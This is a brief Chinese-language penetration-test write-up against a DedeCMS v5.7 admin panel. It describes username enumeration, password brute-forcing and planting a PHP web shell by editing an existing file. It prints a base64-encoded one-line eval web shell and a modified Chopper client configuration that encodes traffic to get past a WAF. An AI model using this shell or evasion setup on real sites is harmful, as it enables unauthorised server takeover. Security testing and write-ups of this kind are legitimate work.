記一次織夢cms滲透測試
0x01 前言
本次測試的整個流程:枚舉用戶名 - 針對性暴破 - 登錄后台 - 后台編輯php文件getshell。
0x02 過程
1、登錄功能模塊存在用戶名枚舉缺陷,利用此權限先枚舉出用戶名
2、登錄功能模塊無驗證碼,通過枚舉出的用戶名暴力破解出相應密碼。並登錄后台(dedecms v57)
3、開始遇到坑了。文件式管理器上傳文件和新增廣告等方式都無法getshell(貌似有waf)。一有動作,連接就會重置。
4、嘗試直接編輯原有文件,將代碼寫入。
(1)寫入phpinfo();可以成功
(2)寫入常規一句話也能成功,但是執行時,連接會被重置
(3)寫入base64編碼一句話<?php @eval(base64_decode($_POST[‘0nth3way’]));?>,將數據編碼后就可以成功執行了
5、菜刀修改配置文件caidao.conf如下,便可連接一句話木馬。
<PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s </PHP_BASE>
6、菜刀成功連上一句話。權限:IIS用戶
7、看到一個名為wkds.exe的進程,感覺是防護軟件,沒有深究。
8、第二天就涼了。
(1)馬子還在,菜刀連不上了。能執行phpinfo();,不能執行system(‘whoami’),查看phpinfo也沒有禁用相關函數啊。問號臉???求解答0.0
(2)后台也無法編輯文件了
0x03 后記
本此測試get到幾點:
(1)流量數據可編碼繞過waf,菜刀改配置連接。
(2)及時行樂